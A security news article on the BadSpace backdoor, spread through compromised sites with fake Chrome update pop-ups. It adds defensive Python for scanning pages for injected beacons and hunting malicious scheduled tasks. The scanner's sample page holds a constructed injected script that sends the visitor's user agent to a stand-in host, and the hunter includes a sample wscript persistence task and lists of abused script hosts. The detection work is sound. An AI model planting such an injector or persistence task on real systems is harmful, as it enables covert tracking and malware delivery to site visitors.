Legitimate but compromised websites are being used as a conduit to distribute a Windows backdoor called BadSpace, under the guise of browser updates.
BadSpace malware according to cybersecurity experts
“The threat actor uses a multi-stage attack chain involving an infected website, a command and control (C2) server, in some cases a fake browser update, and a JScript downloader to deploy a backdoor into the victim’s system,” the German cybersecurity company G DATA said in a report.
Details of the malware were first shared last month by researchers kevross33 and Gi7w0rm.
It all starts with a compromised website, including sites built on WordPress, into which malicious code has been injected to determine whether the user has visited the site before.
If it is the user’s first visit, the code collects information about the device (IP address, user agent and location) and transmits it to an attacker-controlled domain via an HTTP GET request.
The Appearance: Fake Browser Updates
The server’s response then overlays the page content with a fake Google Chrome update pop-up, which either downloads the malware directly or delivers a JavaScript downloader that, in turn, fetches and executes BadSpace.
An analysis of the C2 servers used in the campaign revealed connections to a known malware family called SocGholish (also known as FakeUpdates), a JavaScript-based downloader that is spread through the same mechanism.
BadSpace, in addition to employing anti-sandbox checks and establishing persistence through scheduled tasks, can collect system information and process commands that allow it to capture screenshots, execute instructions via cmd.exe, read and write files, and delete its scheduled task.
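The injection stage described above (a first-visit check, device fingerprinting, a beacon to a foreign domain, and an overlay pushing an "update") is the part a site owner can look for in their own pages. The following is an added example, not G DATA's tooling or the actual injector: a heuristic scanner that pulls every script out of a page and scores it against those behaviours. The indicator regexes, the weights, the threshold, the site host `example-blog.test`, the beacon host `cdn-updates.example` and the sample HTML are all this example's own assumptions; the injected script in the sample is constructed to mimic the chain, not copied from a real compromise.

```python
"""Heuristic scan of a page's scripts for fake-browser-update style injection.

Added example; this is neither G DATA's tooling nor the BadSpace injector.
Indicators mirror the behaviour the article describes; weights, threshold
and sample HTML are this example's own assumptions.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external <script src> URLs."""

    def __init__(self):
        super().__init__()
        self.inline = []      # bodies of inline scripts, in page order
        self.external = []    # src attributes of external scripts
        self._buf = None      # accumulates the current inline script body

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


# One point per indicator hit; a URL to a host outside the site adds two points (assumption).
INDICATORS = {
    "cookie_gate": re.compile(r"document\.cookie"),                     # first-visit gating
    "fingerprint": re.compile(r"navigator\.(userAgent|platform|language)"),
    "beacon":      re.compile(r"XMLHttpRequest|\bfetch\s*\(|new\s+Image\s*\("),
    "overlay":     re.compile(r"document\.write|innerHTML|appendChild"),  # page takeover
    "update_lure": re.compile(r"update", re.I),
}
ABS_URL = re.compile(r"https?://[^\s'\"<>]+")


def foreign_hosts(text, site_host, allowed=()):
    """Hosts referenced by absolute URLs that are neither the site nor allow-listed."""
    hosts = set()
    for url in ABS_URL.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host and host != site_host and host not in allowed:
            hosts.add(host)
    return sorted(hosts)


def score_script(body, site_host, allowed=()):
    """Score one inline script body against the indicators."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
    foreign = foreign_hosts(body, site_host, allowed)
    return {"score": len(hits) + (2 if foreign else 0), "hits": hits, "foreign_hosts": foreign}


def scan_page(html, site_host, allowed=(), threshold=4):
    """Return inline scripts scoring >= threshold and external scripts from foreign hosts."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for idx, body in enumerate(parser.inline):
        result = score_script(body, site_host, allowed)
        if result["score"] >= threshold:
            findings.append({"kind": "inline", "index": idx, **result})
    for src in parser.external:
        host = (urlparse(src).hostname or "").lower()
        if host and host != site_host and host not in allowed:
            findings.append({"kind": "external", "src": src, "foreign_hosts": [host],
                             "hits": [], "score": threshold})
    return findings


# Constructed sample page: one benign theme script and one injected first-visit beacon.
SITE_HOST = "example-blog.test"
SAMPLE_HTML = """<!doctype html>
<html><head><title>Blog</title>
<script src="https://example-blog.test/wp-includes/js/jquery/jquery.min.js"></script>
<script>
  // benign theme script: toggles the mobile menu
  document.getElementById('menu-btn').addEventListener('click', function () {
    document.getElementById('nav').classList.toggle('open');
  });
</script>
</head><body>
<script>
  // injected script, constructed to mimic the chain described in the article
  if (document.cookie.indexOf('_seen=1') === -1) {
    document.cookie = '_seen=1; path=/';
    var x = new XMLHttpRequest();
    x.open('GET', 'https://cdn-updates.example/chk?ua=' + encodeURIComponent(navigator.userAgent), true);
    x.onload = function () { document.write(x.responseText); };
    x.send();
  }
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML, SITE_HOST):
        print(finding)
```

Run against a page saved with `curl -s https://your-site/ > page.html` and pass the site's own hostname; benign analytics scripts typically hit one or two indicators, while an injector of the kind described here hits most of them plus a foreign beacon host. Treat the score as a triage aid, not a verdict: an external script from an allow-listed CDN is normal, and the allow-list parameter is there for exactly that.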
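Persistence through a scheduled task leaves an artifact a responder can hunt for: a task definition whose action launches a script host or other living-off-the-land binary from a user-writable path. The following is an added example, not part of G DATA's analysis or the malware: it parses scheduled-task XML (the format stored under `C:\Windows\System32\Tasks` and emitted by `schtasks /query /xml`) and flags such actions. The list of script hosts, the user-writable path patterns and both task definitions are this example's own constructed assumptions, not indicators taken from a BadSpace sample.

```python
r"""Hunt Windows scheduled tasks whose action runs a script host from a user-writable path.

Added example, not part of G DATA's analysis. The two task definitions are
constructed; on a live host, feed this the files under
C:\Windows\System32\Tasks or the output of `schtasks /query /xml /tn <name>`.
The binary list and path patterns are this example's own assumptions.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts and LOLBins commonly used to launch a dropped script or DLL (assumption).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe", "cmd.exe"}
# Locations an unprivileged user can write to (assumption; extend for your estate).
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|hta|ps1|bat|cmd|dll)\b", re.I)


def parse_task(xml_text):
    """Return the author and the (command, arguments) pairs of a task's Exec actions."""
    root = ET.fromstring(xml_text)
    author = root.findtext("t:RegistrationInfo/t:Author", default="", namespaces=NS)
    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip()
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        actions.append((cmd, args))
    return {"author": author, "actions": actions}


def assess_task(xml_text):
    """Parse a task and attach 'suspicious' plus the reasons it was flagged."""
    info = parse_task(xml_text)
    reasons = []
    for cmd, args in info["actions"]:
        # basename of the command, tolerating quotes and forward slashes
        exe = cmd.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS and SCRIPT_EXT.search(args):
            reasons.append(f"{exe} launches a script or DLL: {args}")
        if USER_WRITABLE.search(cmd + " " + args):
            reasons.append("action runs from a user-writable path")
    info["reasons"] = reasons
    info["suspicious"] = bool(reasons)
    return info


def hunt(tasks):
    """tasks: {task_name: xml_text}; returns the names of the tasks flagged as suspicious."""
    return [name for name, xml in tasks.items() if assess_task(xml)["suspicious"]]


# Constructed task definitions (not real captures): an ordinary updater and a persistence task.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Vendor Installer</Author></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Vendor\Updater\VendorUpdate.exe</Command>
      <Arguments>/check</Arguments>
    </Exec>
  </Actions>
</Task>"""

PERSISTENCE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>DESKTOP-01\alice</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>wscript.exe</Command>
      <Arguments>//E:jscript "C:\Users\alice\AppData\Local\Temp\Update.js"</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml in {"Vendor Update": BENIGN_TASK, "Update": PERSISTENCE_TASK}.items():
        print(name, assess_task(xml)["reasons"])
```

Task names chosen by malware tend to look like legitimate updaters, so the check deliberately ignores the name and keys on what the action actually runs and from where. Tasks created by an unprivileged user with a logon trigger and a script host action are worth reviewing even when the path pattern does not match.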
The disclosure comes as both eSentire and Sucuri have warned of several campaigns exploiting fake browser updates on compromised sites to distribute information stealers and remote access trojans.
What to do if you encounter BadSpace or similar threats
Below are a few tips for mitigating BadSpace and similar threats:
- Don’t click on suspicious pop-ups: if you see an unsolicited browser update window, do not click it. This should be common knowledge by now, but evidently it is not.
- Official updates: always install browser and operating system updates through the software’s own update mechanism or from the vendor’s official site, never from a pop-up on a third-party page.
- Use antivirus software: keep your antivirus software active and up to date so it can detect and block threats.
- Check the system: if you suspect an infection, run a full system scan with reputable security software.
- Malware removal: if an infection is confirmed, follow your antivirus software’s removal instructions. Persistent malware may require specialized removal tools; in the case of BadSpace, also check for the scheduled task it creates.
- Update credentials: change the passwords for all accounts accessed from the infected device, ideally from a clean device, to prevent further compromise.
- Consult an expert: if you cannot resolve the infection yourself, seek professional assistance from a cybersecurity specialist.
Some similar cases
In recent years there have been several similar cases of malware distributed via fake browser updates and compromised websites; as mentioned above, one example is SocGholish, which uses almost the same techniques as BadSpace to infect users’ devices.
Another well-known case is the Adrozek malware family, which was pushed to Windows systems through drive-by downloads and modified browsers to inject unwanted advertisements into search results.
Emotet, one of the most widespread Trojans, spread primarily through phishing emails and often used compromised websites to host its payloads, infecting corporate networks.
These examples highlight the importance of remaining vigilant and taking appropriate security measures to protect your systems from similar threats.